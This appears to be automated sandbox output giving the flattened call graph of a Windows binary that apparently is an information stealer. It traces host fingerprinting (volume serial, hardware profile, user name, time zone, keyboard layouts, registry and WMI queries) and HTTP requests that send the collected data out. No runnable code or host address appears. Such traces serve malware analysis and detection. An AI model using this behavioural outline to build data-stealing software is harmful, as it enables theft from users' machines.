75008->75009 75011 410562 lstrcpyA 75009->75011 75010 401cfd lstrcpyA 75010->75053 75014 416c6e 75011->75014 75012 416880 28 API calls 75012->75053 75013 416908 33 API calls 75013->75053 75015 4104bc lstrcpyA 75014->75015 75016 416d4d 75015->75016 75017 410562 lstrcpyA 75016->75017 75019 416d57 75017->75019 75018 416b93 StrCmpCA 75020 416bec StrCmpCA 75018->75020 75018->75053 76267 416de4 75019->76267 75022 416c02 StrCmpCA 75020->75022 75023 416ce5 75020->75023 75025 416cb4 75022->75025 75026 416c18 StrCmpCA 75022->75026 75024 410562 lstrcpyA 75023->75024 75030 416cf0 75024->75030 75028 410562 lstrcpyA 75025->75028 75031 416c80 75026->75031 75032 416c2a StrCmpCA 75026->75032 75027 4104ee lstrcpyA 75027->75053 75033 416cbf 75028->75033 75035 4104bc lstrcpyA 75030->75035 75034 410562 lstrcpyA 75031->75034 75036 416c4c 75032->75036 75037 416c3c Sleep 75032->75037 75039 4104bc lstrcpyA 75033->75039 75040 416c8b 75034->75040 75041 416cfd 75035->75041 75038 410562 lstrcpyA 75036->75038 75037->75053 75043 416c57 75038->75043 75044 416ccc 75039->75044 75045 4104bc lstrcpyA 75040->75045 75042 410562 lstrcpyA 75041->75042 75042->75014 75046 4104bc lstrcpyA 75043->75046 75047 410562 lstrcpyA 75044->75047 75048 416c98 75045->75048 75049 416c64 75046->75049 75047->75014 75050 410562 lstrcpyA 75048->75050 75051 410562 lstrcpyA 75049->75051 75050->75014 75051->75014 75052 410562 lstrcpyA 75052->75053 75053->75000 75053->75001 75053->75010 75053->75012 75053->75013 75053->75018 75053->75020 75053->75027 75053->75052 76258 4029f8 75053->76258 76261 402a09 75053->76261 76264 402a1a 75053->76264 76274 402a2b lstrcpyA 75053->76274 76275 402a3c lstrcpyA 75053->76275 76276 402a4d lstrcpyA 75053->76276 75054 416d6a 75054->73991 75056 410562 lstrcpyA 75055->75056 75057 418299 75056->75057 75058 410562 lstrcpyA 75057->75058 75059 4182a4 75058->75059 75060 410562 lstrcpyA 75059->75060 75061 4182af 75060->75061 75061->73994 75063 4104fe 75062->75063 75064 410513 75063->75064 75065 41050b lstrcpyA 75063->75065 75064->74007 75065->75064 75067 4109b4 75066->75067 75068 4109bb GetVolumeInformationA 75066->75068 75067->75068 75069 410a22 75068->75069 75069->75069 75070 410a37 GetProcessHeap HeapAlloc 75069->75070 75071 410a61 wsprintfA lstrcatA 75070->75071 75072 410a52 75070->75072 76277 411659 GetCurrentHwProfileA 75071->76277 75073 4104bc lstrcpyA 75072->75073 75075 410a5a 75073->75075 75079 41d05a __setlocale_nolock 5 API calls 75075->75079 75076 410a9c lstrlenA 76293 4123aa lstrcpyA malloc strncpy 75076->76293 75078 410abf lstrcatA 75081 410ad6 75078->75081 75080 410b03 75079->75080 75080->74034 75082 4104bc lstrcpyA 75081->75082 75083 410aed 75082->75083 75083->75075 75085 4104ee lstrcpyA 75084->75085 75086 404b59 75085->75086 76297 404ab6 75086->76297 75088 404b65 75089 4104bc lstrcpyA 75088->75089 75090 404b81 75089->75090 75091 4104bc lstrcpyA 75090->75091 75092 404b91 75091->75092 75093 4104bc lstrcpyA 75092->75093 75094 404ba1 75093->75094 75095 4104bc lstrcpyA 75094->75095 75096 404bb1 75095->75096 75097 4104bc lstrcpyA 75096->75097 75098 404bc1 InternetOpenA StrCmpCA 75097->75098 75099 404bf5 75098->75099 75100 405194 InternetCloseHandle 75099->75100 75101 411c1f 7 API calls 75099->75101 75111 4051e1 75100->75111 75102 404c15 75101->75102 75103 41059c 2 API calls 75102->75103 75104 404c28 75103->75104 75105 410562 lstrcpyA 75104->75105 75106 404c33 75105->75106 75107 4105de 3 API calls 75106->75107 75108 404c5f 75107->75108 75109 410562 lstrcpyA 75108->75109 75110 404c6a 75109->75110 75112 4105de 3 API calls 75110->75112 75113 41d05a __setlocale_nolock 5 API calls 75111->75113 75114 404c8b 75112->75114 75115 405235 75113->75115 75116 410562 lstrcpyA 75114->75116 75217 413a02 StrCmpCA 75115->75217 75117 404c96 75116->75117 75118 41059c 2 API calls 75117->75118 75119 404cb8 75118->75119 75120 410562 lstrcpyA 75119->75120 75121 404cc3 75120->75121 75122 4105de 3 API calls 75121->75122 75123 404ce4 75122->75123 75124 410562 lstrcpyA 75123->75124 75125 404cef 75124->75125 75126 4105de 3 API calls 75125->75126 75127 404d10 75126->75127 75128 410562 lstrcpyA 75127->75128 75129 404d1b 75128->75129 75130 4105de 3 API calls 75129->75130 75131 404d3d 75130->75131 75132 41059c 2 API calls 75131->75132 75133 404d48 75132->75133 75134 410562 lstrcpyA 75133->75134 75135 404d53 75134->75135 75136 404d69 InternetConnectA 75135->75136 75136->75100 75137 404d97 HttpOpenRequestA 75136->75137 75138 404dd7 75137->75138 75139 405188 InternetCloseHandle 75137->75139 75140 404dfb 75138->75140 75141 404ddf InternetSetOptionA 75138->75141 75139->75100 75142 4105de 3 API calls 75140->75142 75141->75140 75143 404e11 75142->75143 75144 410562 lstrcpyA 75143->75144 75145 404e1c 75144->75145 75146 41059c 2 API calls 75145->75146 75147 404e3e 75146->75147 75148 410562 lstrcpyA 75147->75148 75149 404e49 75148->75149 75150 4105de 3 API calls 75149->75150 75151 404e6a 75150->75151 75152 410562 lstrcpyA 75151->75152 75153 404e75 75152->75153 75154 4105de 3 API calls 75153->75154 75155 404e97 75154->75155 75156 410562 lstrcpyA 75155->75156 75157 404ea2 75156->75157 75158 4105de 3 API calls 75157->75158 75159 404ec3 75158->75159 75160 410562 lstrcpyA 75159->75160 75161 404ece 75160->75161 75162 4105de 3 API calls 75161->75162 75163 404eef 75162->75163 75164 410562 lstrcpyA 75163->75164 75165 404efa 75164->75165 75166 41059c 2 API calls 75165->75166 75167 404f19 75166->75167 75168 410562 lstrcpyA 75167->75168 75169 404f24 75168->75169 75170 4105de 3 API calls 75169->75170 75171 404f45 75170->75171 75172 410562 lstrcpyA 75171->75172 75173 404f50 75172->75173 75174 4105de 3 API calls 75173->75174 75175 404f71 75174->75175 75176 410562 lstrcpyA 75175->75176 75177 404f7c 75176->75177 75178 41059c 2 API calls 75177->75178 75179 404f9e 75178->75179 75180 410562 lstrcpyA 75179->75180 75181 404fa9 75180->75181 75182 4105de 3 API calls 75181->75182 75183 404fca 75182->75183 75184 410562 lstrcpyA 75183->75184 75185 404fd5 75184->75185 75186 4105de 3 API calls 75185->75186 75187 404ff7 75186->75187 75188 410562 lstrcpyA 75187->75188 75189 405002 75188->75189 75190 4105de 3 API calls 75189->75190 75191 405023 75190->75191 75192 410562 lstrcpyA 75191->75192 75193 40502e 75192->75193 75194 4105de 3 API calls 75193->75194 75195 40504f 75194->75195 75196 410562 lstrcpyA 75195->75196 75197 40505a 75196->75197 75198 41059c 2 API calls 75197->75198 75199 405079 75198->75199 75200 410562 lstrcpyA 75199->75200 75201 405084 75200->75201 75202 4104bc lstrcpyA 75201->75202 75203 40509f 75202->75203 75204 41059c 2 API calls 75203->75204 75205 4050b6 75204->75205 75206 41059c 2 API calls 75205->75206 75207 4050c7 75206->75207 75208 410562 lstrcpyA 75207->75208 75209 4050d2 75208->75209 75210 4050e8 lstrlenA lstrlenA HttpSendRequestA 75209->75210 75211 40515c InternetReadFile 75210->75211 75212 405176 InternetCloseHandle 75211->75212 75215 40511c 75211->75215 75213 402920 75212->75213 75213->75139 75214 4105de 3 API calls 75214->75215 75215->75211 75215->75212 75215->75214 75216 410562 lstrcpyA 75215->75216 75216->75215 75218 413a21 ExitProcess 75217->75218 75219 413a28 strtok_s 75217->75219 75220 413b88 75219->75220 75233 413a44 75219->75233 75220->74042 75221 413b6a strtok_s 75221->75220 75221->75233 75222 413a61 StrCmpCA 75222->75221 75222->75233 75223 413ab5 StrCmpCA 75223->75221 75223->75233 75224 413af4 StrCmpCA 75224->75221 75224->75233 75225 413b34 StrCmpCA 75225->75221 75226 413b56 StrCmpCA 75226->75221 75227 413a99 StrCmpCA 75227->75221 75227->75233 75228 413b09 StrCmpCA 75228->75221 75228->75233 75229 413a7d StrCmpCA 75229->75221 75229->75233 75230 413adf StrCmpCA 75230->75221 75230->75233 75231 413b1e StrCmpCA 75231->75221 75232 41051e 2 API calls 75232->75233 75233->75221 75233->75222 75233->75223 75233->75224 75233->75225 75233->75226 75233->75227 75233->75228 75233->75229 75233->75230 75233->75231 75233->75232 75235 4104ee lstrcpyA 75234->75235 75236 405f64 75235->75236 75237 404ab6 5 API calls 75236->75237 75238 405f70 75237->75238 75239 4104bc lstrcpyA 75238->75239 75240 405f8c 75239->75240 75241 4104bc lstrcpyA 75240->75241 75242 405f9c 75241->75242 75243 4104bc lstrcpyA 75242->75243 75244 405fac 75243->75244 75245 4104bc lstrcpyA 75244->75245 75246 405fbc 75245->75246 75247 4104bc lstrcpyA 75246->75247 75248 405fcc InternetOpenA StrCmpCA 75247->75248 75249 406000 75248->75249 75250 4066ff InternetCloseHandle 75249->75250 75251 411c1f 7 API calls 75249->75251 76303 408048 CryptStringToBinaryA 75250->76303 75254 406020 75251->75254 75255 41059c 2 API calls 75254->75255 75257 406033 75255->75257 75256 41051e 2 API calls 75259 406739 75256->75259 75258 410562 lstrcpyA 75257->75258 75263 40603e 75258->75263 75260 4105de 3 API calls 75259->75260 75261 406750 75260->75261 75262 410562 lstrcpyA 75261->75262 75268 40675b 75262->75268 75264 4105de 3 API calls 75263->75264 75265 40606a 75264->75265 75266 410562 lstrcpyA 75265->75266 75267 406075 75266->75267 75270 4105de 3 API calls 75267->75270 75269 41d05a __setlocale_nolock 5 API calls 75268->75269 75271 4067eb 75269->75271 75272 406096 75270->75272 75401 41347f strtok_s 75271->75401 75273 410562 lstrcpyA 75272->75273 75274 4060a1 75273->75274 75275 41059c 2 API calls 75274->75275 75276 4060c3 75275->75276 75277 410562 lstrcpyA 75276->75277 75278 4060ce 75277->75278 75279 4105de 3 API calls 75278->75279 75280 4060ef 75279->75280 75281 410562 lstrcpyA 75280->75281 75282 4060fa 75281->75282 75283 4105de 3 API calls 75282->75283 75284 40611b 75283->75284 75285 410562 lstrcpyA 75284->75285 75286 406126 75285->75286 75287 4105de 3 API calls 75286->75287 75288 406148 75287->75288 75289 41059c 2 API calls 75288->75289 75290 406153 75289->75290 75291 410562 lstrcpyA 75290->75291 75292 40615e 75291->75292 75293 406174 InternetConnectA 75292->75293 75293->75250 75294 4061a2 HttpOpenRequestA 75293->75294 75295 4061e2 75294->75295 75296 4066f3 InternetCloseHandle 75294->75296 75297 406206 75295->75297 75298 4061ea InternetSetOptionA 75295->75298 75296->75250 75299 4105de 3 API calls 75297->75299 75298->75297 75300 40621c 75299->75300 75301 410562 lstrcpyA 75300->75301 75302 406227 75301->75302 75303 41059c 2 API calls 75302->75303 75304 406249 75303->75304 75305 410562 lstrcpyA 75304->75305 75306 406254 75305->75306 75307 4105de 3 API calls 75306->75307 75308 406275 75307->75308 75309 410562 lstrcpyA 75308->75309 75310 406280 75309->75310 75311 4105de 3 API calls 75310->75311 75312 4062a2 75311->75312 75313 410562 lstrcpyA 75312->75313 75314 4062ad 75313->75314 75315 4105de 3 API calls 75314->75315 75316 4062cf 75315->75316 75317 410562 lstrcpyA 75316->75317 75318 4062da 75317->75318 75319 4105de 3 API calls 75318->75319 75320 4062fb 75319->75320 75321 410562 lstrcpyA 75320->75321 75322 406306 75321->75322 75323 41059c 2 API calls 75322->75323 75324 406325 75323->75324 75325 410562 lstrcpyA 75324->75325 75326 406330 75325->75326 75327 4105de 3 API calls 75326->75327 75328 406351 75327->75328 75329 410562 lstrcpyA 75328->75329 75330 40635c 75329->75330 75331 4105de 3 API calls 75330->75331 75332 40637d 75331->75332 75333 410562 lstrcpyA 75332->75333 75334 406388 75333->75334 75335 41059c 2 API calls 75334->75335 75336 4063aa 75335->75336 75337 410562 lstrcpyA 75336->75337 75338 4063b5 75337->75338 75339 4105de 3 API calls 75338->75339 75340 4063d6 75339->75340 75341 410562 lstrcpyA 75340->75341 75342 4063e1 75341->75342 75343 4105de 3 API calls 75342->75343 75344 406403 75343->75344 75345 410562 lstrcpyA 75344->75345 75346 40640e 75345->75346 75347 4105de 3 API calls 75346->75347 75348 40642f 75347->75348 75349 410562 lstrcpyA 75348->75349 75350 40643a 75349->75350 75351 4105de 3 API calls 75350->75351 75352 40645b 75351->75352 75353 410562 lstrcpyA 75352->75353 75354 406466 75353->75354 75355 4105de 3 API calls 75354->75355 75356 406487 75355->75356 75357 410562 lstrcpyA 75356->75357 75358 406492 75357->75358 75359 4105de 3 API calls 75358->75359 75360 4064b3 75359->75360 75361 410562 lstrcpyA 75360->75361 75362 4064be 75361->75362 75363 4105de 3 API calls 75362->75363 75364 4064df 75363->75364 75365 410562 lstrcpyA 75364->75365 75366 4064ea 75365->75366 75367 41059c 2 API calls 75366->75367 75368 406506 75367->75368 75369 410562 lstrcpyA 75368->75369 75370 406511 75369->75370 75371 4105de 3 API calls 75370->75371 75372 406532 75371->75372 75373 410562 lstrcpyA 75372->75373 75374 40653d 75373->75374 75375 4105de 3 API calls 75374->75375 75376 40655f 75375->75376 75377 410562 lstrcpyA 75376->75377 75378 40656a 75377->75378 75379 4105de 3 API calls 75378->75379 75380 40658b 75379->75380 75381 410562 lstrcpyA 75380->75381 75382 406596 75381->75382 75383 4105de 3 API calls 75382->75383 75384 4065b7 75383->75384 75385 410562 lstrcpyA 75384->75385 75386 4065c2 75385->75386 75387 41059c 2 API calls 75386->75387 75388 4065e1 75387->75388 75389 410562 lstrcpyA 75388->75389 75390 4065ec 75389->75390 75391 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 75390->75391 76301 4270a0 75391->76301 75393 40663e lstrlenA lstrlenA 75394 4270a0 _memmove 75393->75394 75395 406667 lstrlenA HttpSendRequestA 75394->75395 75396 4066d2 InternetReadFile 75395->75396 75397 4066ec InternetCloseHandle 75396->75397 75399 406692 75396->75399 75397->75296 75398 4105de 3 API calls 75398->75399 75399->75396 75399->75397 75399->75398 75400 410562 lstrcpyA 75399->75400 75400->75399 75402 41350c 75401->75402 75403 4134ae 75401->75403 75402->74057 75404 4134f6 strtok_s 75403->75404 75405 41051e 2 API calls 75403->75405 75406 41051e 2 API calls 75403->75406 75404->75402 75404->75403 75405->75404 75406->75403 75411 4132c6 75407->75411 75408 4133c5 75408->74070 75409 413372 StrCmpCA 75409->75411 75410 41051e 2 API calls 75410->75411 75411->75408 75411->75409 75411->75410 75412 4133a7 strtok_s 75411->75412 75413 413341 StrCmpCA 75411->75413 75414 41331c StrCmpCA 75411->75414 75415 4132eb StrCmpCA 75411->75415 75412->75411 75413->75411 75414->75411 75415->75411 75417 413474 75416->75417 75421 4133fc 75416->75421 75417->74083 75418 413422 StrCmpCA 75418->75421 75419 41051e 2 API calls 75420 41345a strtok_s 75419->75420 75420->75417 75420->75421 75421->75418 75421->75419 75421->75420 75422 41051e 2 API calls 75421->75422 75422->75421 75424 4104bc lstrcpyA 75423->75424 75425 413bdf 75424->75425 75426 4105de 3 API calls 75425->75426 75427 413bef 75426->75427 75428 410562 lstrcpyA 75427->75428 75429 413bf7 75428->75429 75430 4105de 3 API calls 75429->75430 75431 413c0f 75430->75431 75432 410562 lstrcpyA 75431->75432 75433 413c17 75432->75433 75434 4105de 3 API calls 75433->75434 75435 413c2f 75434->75435 75436 410562 lstrcpyA 75435->75436 75437 413c37 75436->75437 75438 4105de 3 API calls 75437->75438 75439 413c4f 75438->75439 75440 410562 lstrcpyA 75439->75440 75441 413c57 75440->75441 75442 4105de 3 API calls 75441->75442 75443 413c6f 75442->75443 75444 410562 lstrcpyA 75443->75444 75445 413c77 75444->75445 76308 410c95 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 75445->76308 75448 4105de 3 API calls 75449 413c90 75448->75449 75450 410562 lstrcpyA 75449->75450 75451 413c98 75450->75451 75452 4105de 3 API calls 75451->75452 75453 413cb0 75452->75453 75454 410562 lstrcpyA 75453->75454 75455 413cb8 75454->75455 75456 4105de 3 API calls 75455->75456 75457 413cd0 75456->75457 75458 410562 lstrcpyA 75457->75458 75459 413cd8 75458->75459 76311 4115a9 75459->76311 75462 4105de 3 API calls 75463 413cf1 75462->75463 75464 410562 lstrcpyA 75463->75464 75465 413cf9 75464->75465 75466 4105de 3 API calls 75465->75466 75467 413d11 75466->75467 75468 410562 lstrcpyA 75467->75468 75469 413d19 75468->75469 75470 4105de 3 API calls 75469->75470 75471 413d31 75470->75471 75472 410562 lstrcpyA 75471->75472 75473 413d39 75472->75473 75474 411659 11 API calls 75473->75474 75475 413d49 75474->75475 75476 41059c 2 API calls 75475->75476 75477 413d56 75476->75477 75478 410562 lstrcpyA 75477->75478 75479 413d5e 75478->75479 75480 4105de 3 API calls 75479->75480 75481 413d7e 75480->75481 75482 410562 lstrcpyA 75481->75482 75483 413d86 75482->75483 75484 4105de 3 API calls 75483->75484 75485 413d9e 75484->75485 75486 410562 lstrcpyA 75485->75486 75487 413da6 75486->75487 75488 410977 19 API calls 75487->75488 75489 413db6 75488->75489 75490 41059c 2 API calls 75489->75490 75491 413dc3 75490->75491 75492 410562 lstrcpyA 75491->75492 75493 413dcb 75492->75493 75494 4105de 3 API calls 75493->75494 75495 413deb 75494->75495 75496 410562 lstrcpyA 75495->75496 75497 413df3 75496->75497 75498 4105de 3 API calls 75497->75498 75499 413e0b 75498->75499 75500 410562 lstrcpyA 75499->75500 75501 413e13 75500->75501 75502 413e1b GetCurrentProcessId 75501->75502 76318 41221f OpenProcess 75502->76318 75505 41059c 2 API calls 75506 413e38 75505->75506 75507 410562 lstrcpyA 75506->75507 75508 413e40 75507->75508 75509 4105de 3 API calls 75508->75509 75510 413e60 75509->75510 75511 410562 lstrcpyA 75510->75511 75512 413e68 75511->75512 75513 4105de 3 API calls 75512->75513 75514 413e80 75513->75514 75515 410562 lstrcpyA 75514->75515 75516 413e88 75515->75516 75517 4105de 3 API calls 75516->75517 75518 413ea0 75517->75518 75519 410562 lstrcpyA 75518->75519 75520 413ea8 75519->75520 75521 4105de 3 API calls 75520->75521 75522 413ec0 75521->75522 75523 410562 lstrcpyA 75522->75523 75524 413ec8 75523->75524 76325 410b05 GetProcessHeap HeapAlloc 75524->76325 75527 4105de 3 API calls 75528 413ee1 75527->75528 75529 410562 lstrcpyA 75528->75529 75530 413ee9 75529->75530 75531 4105de 3 API calls 75530->75531 75532 413f01 75531->75532 75533 410562 lstrcpyA 75532->75533 75534 413f09 75533->75534 75535 4105de 3 API calls 75534->75535 75536 413f21 75535->75536 75537 410562 lstrcpyA 75536->75537 75538 413f29 75537->75538 76332 4117dc 75538->76332 75541 41059c 2 API calls 75542 413f46 75541->75542 75543 410562 lstrcpyA 75542->75543 75544 413f4e 75543->75544 75545 4105de 3 API calls 75544->75545 75546 413f6e 75545->75546 75547 410562 lstrcpyA 75546->75547 75548 413f76 75547->75548 75549 4105de 3 API calls 75548->75549 75550 413f8e 75549->75550 75551 410562 lstrcpyA 75550->75551 75552 413f96 75551->75552 76349 41196c 75552->76349 75554 413fa7 75555 41059c 2 API calls 75554->75555 75556 413fb5 75555->75556 75557 410562 lstrcpyA 75556->75557 75558 413fbd 75557->75558 75559 4105de 3 API calls 75558->75559 75560 413fdd 75559->75560 75561 410562 lstrcpyA 75560->75561 75562 413fe5 75561->75562 75563 4105de 3 API calls 75562->75563 75564 413ffd 75563->75564 75565 410562 lstrcpyA 75564->75565 75566 414005 75565->75566 75567 410c5a 3 API calls 75566->75567 75568 414012 75567->75568 75569 4105de 3 API calls 75568->75569 75570 41401e 75569->75570 75571 410562 lstrcpyA 75570->75571 75572 414026 75571->75572 75573 4105de 3 API calls 75572->75573 75574 41403e 75573->75574 75575 410562 lstrcpyA 75574->75575 75576 414046 75575->75576 75577 4105de 3 API calls 75576->75577 75578 41405e 75577->75578 75579 410562 lstrcpyA 75578->75579 75580 414066 75579->75580 76364 410c28 GetProcessHeap HeapAlloc GetUserNameA 75580->76364 75582 414073 75583 4105de 3 API calls 75582->75583 75584 41407f 75583->75584 75585 410562 lstrcpyA 75584->75585 75586 414087 75585->75586 75587 4105de 3 API calls 75586->75587 75588 41409f 75587->75588 75589 410562 lstrcpyA 75588->75589 75590 4140a7 75589->75590 75591 4105de 3 API calls 75590->75591 75592 4140bf 75591->75592 75593 410562 lstrcpyA 75592->75593 75594 4140c7 75593->75594 76365 411538 7 API calls 75594->76365 75597 41059c 2 API calls 75598 4140e6 75597->75598 75599 410562 lstrcpyA 75598->75599 75600 4140ee 75599->75600 75601 4105de 3 API calls 75600->75601 75602 41410e 75601->75602 75603 410562 lstrcpyA 75602->75603 75604 414116 75603->75604 75605 4105de 3 API calls 75604->75605 75606 41412e 75605->75606 75607 410562 lstrcpyA 75606->75607 75608 414136 75607->75608 76368 410db0 75608->76368 75611 41059c 2 API calls 75612 414153 75611->75612 75613 410562 lstrcpyA 75612->75613 75614 41415b 75613->75614 75615 4105de 3 API calls 75614->75615 75616 41417b 75615->75616 75617 410562 lstrcpyA 75616->75617 75618 414183 75617->75618 75619 4105de 3 API calls 75618->75619 75620 41419b 75619->75620 75621 410562 lstrcpyA 75620->75621 75622 4141a3 75621->75622 75623 410c95 9 API calls 75622->75623 75624 4141b0 75623->75624 75625 4105de 3 API calls 75624->75625 75626 4141bc 75625->75626 75627 410562 lstrcpyA 75626->75627 75628 4141c4 75627->75628 75629 4105de 3 API calls 75628->75629 75630 4141dc 75629->75630 75631 410562 lstrcpyA 75630->75631 75632 4141e4 75631->75632 75633 4105de 3 API calls 75632->75633 75634 4141fc 75633->75634 75635 410562 lstrcpyA 75634->75635 75636 414204 75635->75636 76380 410d03 GetProcessHeap HeapAlloc GetTimeZoneInformation 75636->76380 75639 4105de 3 API calls 75640 41421d 75639->75640 75641 410562 lstrcpyA 75640->75641 75642 414225 75641->75642 75643 4105de 3 API calls 75642->75643 75644 41423d 75643->75644 75645 410562 lstrcpyA 75644->75645 75646 414245 75645->75646 75647 4105de 3 API calls 75646->75647 75648 41425d 75647->75648 75649 410562 lstrcpyA 75648->75649 75650 414265 75649->75650 75651 4105de 3 API calls 75650->75651 75652 41427d 75651->75652 75653 410562 lstrcpyA 75652->75653 75654 414285 75653->75654 76385 410f26 GetProcessHeap HeapAlloc RegOpenKeyExA 75654->76385 75656 414292 75657 4105de 3 API calls 75656->75657 75658 41429e 75657->75658 75659 410562 lstrcpyA 75658->75659 75660 4142a6 75659->75660 75661 4105de 3 API calls 75660->75661 75662 4142be 75661->75662 75663 410562 lstrcpyA 75662->75663 75664 4142c6 75663->75664 75665 4105de 3 API calls 75664->75665 75666 4142de 75665->75666 75667 410562 lstrcpyA 75666->75667 75668 4142e6 75667->75668 76388 410fdc 75668->76388 75671 4105de 3 API calls 75672 4142ff 75671->75672 75673 410562 lstrcpyA 75672->75673 75674 414307 75673->75674 75675 4105de 3 API calls 75674->75675 75676 41431f 75675->75676 75677 410562 lstrcpyA 75676->75677 75678 414327 75677->75678 75679 4105de 3 API calls 75678->75679 75680 41433f 75679->75680 75681 410562 lstrcpyA 75680->75681 75682 414347 75681->75682 76405 410f8f GetSystemInfo wsprintfA 75682->76405 75685 4105de 3 API calls 75686 414360 75685->75686 75687 410562 lstrcpyA 75686->75687 75688 414368 75687->75688 75689 4105de 3 API calls 75688->75689 75690 414380 75689->75690 75691 410562 lstrcpyA 75690->75691 75692 414388 75691->75692 75693 4105de 3 API calls 75692->75693 75694 4143a0 75693->75694 75695 410562 lstrcpyA 75694->75695 75696 4143a8 75695->75696 76408 4110ee GetProcessHeap HeapAlloc 75696->76408 75699 4105de 3 API calls 75700 4143c1 75699->75700 75701 410562 lstrcpyA 75700->75701 75702 4143c9 75701->75702 75703 4105de 3 API calls 75702->75703 75704 4143e4 75703->75704 75705 410562 lstrcpyA 75704->75705 75706 4143ec 75705->75706 75707 4105de 3 API calls 75706->75707 75708 414407 75707->75708 75709 410562 lstrcpyA 75708->75709 75710 41440f 75709->75710 76415 411167 75710->76415 75713 41059c 2 API calls 75714 41442f 75713->75714 75715 410562 lstrcpyA 75714->75715 75716 414437 75715->75716 75717 4105de 3 API calls 75716->75717 75718 41445a 75717->75718 75719 410562 lstrcpyA 75718->75719 75720 414462 75719->75720 75721 4105de 3 API calls 75720->75721 75722 41447a 75721->75722 75723 410562 lstrcpyA 75722->75723 75724 414482 75723->75724 76423 41147a 75724->76423 75727 41059c 2 API calls 75728 4144a2 75727->75728 75729 410562 lstrcpyA 75728->75729 75730 4144aa 75729->75730 75731 4105de 3 API calls 75730->75731 75732 4144d0 75731->75732 75733 410562 lstrcpyA 75732->75733 75734 4144d8 75733->75734 75735 4105de 3 API calls 75734->75735 75736 4144f3 75735->75736 75737 410562 lstrcpyA 75736->75737 75738 4144fb 75737->75738 76433 4111d8 75738->76433 75741 41059c 2 API calls 75742 414520 75741->75742 75743 410562 lstrcpyA 75742->75743 75744 414528 75743->75744 75745 4111d8 21 API calls 75744->75745 75746 414549 75745->75746 75747 41059c 2 API calls 75746->75747 75748 414558 75747->75748 75749 410562 lstrcpyA 75748->75749 75750 414560 75749->75750 75751 4105de 3 API calls 75750->75751 75752 414583 75751->75752 75753 410562 lstrcpyA 75752->75753 75754 41458b 75753->75754 75755 401cfd lstrcpyA 75754->75755 75756 4145a0 lstrlenA 75755->75756 75757 4104bc lstrcpyA 75756->75757 75758 4145bd 75757->75758 76453 416ed9 75758->76453 75760 4145c6 75760->74090 75762 4104ee lstrcpyA 75761->75762 75763 40525a 75762->75763 75764 404ab6 5 API calls 75763->75764 75765 405266 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 75764->75765 75766 4052cb 75765->75766 75767 4052d9 InternetConnectA 75766->75767 75768 40544b InternetCloseHandle 75766->75768 75769 40545f 75768->75769 75770 41d05a __setlocale_nolock 5 API calls 75769->75770 75771 405480 75770->75771 75771->74101 76698 407eee 75772->76698 75796 40eaa8 76254->74952 76256 41d05a __setlocale_nolock 5 API calls 76255->76256 76257 4125d6 76256->76257 76257->74166 76257->74173 76259 4104bc lstrcpyA 76258->76259 76260 402a05 76259->76260 76260->75053 76262 4104bc lstrcpyA 76261->76262 76263 402a16 76262->76263 76263->75053 76265 4104bc lstrcpyA 76264->76265 76266 402a27 76265->76266 76266->75053 76268 4104ee lstrcpyA 76267->76268 76269 416dee 76268->76269 76270 4104ee lstrcpyA 76269->76270 76271 416df9 76270->76271 76272 4104ee lstrcpyA 76271->76272 76273 416e04 76272->76273 76273->75054 76274->75053 76275->75053 76276->75053 76278 411711 76277->76278 76279 411682 76277->76279 76280 4104bc lstrcpyA 76278->76280 76281 4104bc lstrcpyA 76279->76281 76283 41171d 76280->76283 76282 411695 _memset 76281->76282 76294 4123aa lstrcpyA malloc strncpy 76282->76294 76284 41d05a __setlocale_nolock 5 API calls 76283->76284 76285 41172a 76284->76285 76285->75076 76287 4116bf lstrcatA 76295 402920 76287->76295 76289 4116dc lstrcatA 76290 4116f9 76289->76290 76291 4104bc lstrcpyA 76290->76291 76292 411707 76291->76292 76292->76283 76293->75078 76294->76287 76296 402924 76295->76296 76296->76289 76298 404ac4 76297->76298 76298->76298 76299 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 76298->76299 76300 404b27 76299->76300 76300->75088 76302 4270b8 76301->76302 76302->75393 76302->76302 76304 40806a LocalAlloc 76303->76304 76305 406724 76303->76305 76304->76305 76306 40807a CryptStringToBinaryA 76304->76306 76305->75256 76305->75268 76306->76305 76307 408091 LocalFree 76306->76307 76307->76305 76309 41d05a __setlocale_nolock 5 API calls 76308->76309 76310 410d01 76309->76310 76310->75448 76470 423c60 76311->76470 76314 411605 RegQueryValueExA 76315 411626 RegCloseKey CharToOemA 76314->76315 76316 41d05a __setlocale_nolock 5 API calls 76315->76316 76317 411657 76316->76317 76317->75462 76319 412269 76318->76319 76320 41224d K32GetModuleFileNameExA CloseHandle 76318->76320 76321 4104bc lstrcpyA 76319->76321 76320->76319 76322 412275 76321->76322 76323 41d05a __setlocale_nolock 5 API calls 76322->76323 76324 412283 76323->76324 76324->75505 76472 410beb 76325->76472 76328 410b31 76328->75527 76329 410b38 RegOpenKeyExA 76330 410b70 RegCloseKey 76329->76330 76331 410b58 RegQueryValueExA 76329->76331 76330->76328 76331->76330 76479 42f159 76332->76479 76334 4117e8 CoInitializeEx CoInitializeSecurity CoCreateInstance 76335 411840 76334->76335 76336 411848 CoSetProxyBlanket 76335->76336 76341 411939 76335->76341 76338 411878 76336->76338 76337 4104bc lstrcpyA 76339 411964 76337->76339 76338->76341 76343 4118ac VariantInit 76338->76343 76340 42f1b5 5 API calls 76339->76340 76342 41196b 76340->76342 76341->76337 76342->75541 76344 4118cb 76343->76344 76480 41172c 76344->76480 76346 4118d6 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 76347 4104bc lstrcpyA 76346->76347 76348 41192d VariantClear 76347->76348 76348->76339 76489 42f0ed 76349->76489 76351 411978 CoInitializeEx CoInitializeSecurity CoCreateInstance 76352 4119ce 76351->76352 76353 4119d6 CoSetProxyBlanket 76352->76353 76356 411a68 76352->76356 76355 411a06 76353->76355 76354 4104bc lstrcpyA 76357 411a93 76354->76357 76355->76356 76358 411a2e VariantInit 76355->76358 76356->76354 76357->75554 76359 411a4d 76358->76359 76490 411d17 LocalAlloc CharToOemW 76359->76490 76361 411a55 76362 4104bc lstrcpyA 76361->76362 76363 411a5c VariantClear 76362->76363 76363->76357 76364->75582 76366 4104bc lstrcpyA 76365->76366 76367 4115a2 76366->76367 76367->75597 76369 4104bc lstrcpyA 76368->76369 76370 410dd7 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 76369->76370 76377 410e11 76370->76377 76379 410ec2 76370->76379 76371 410e17 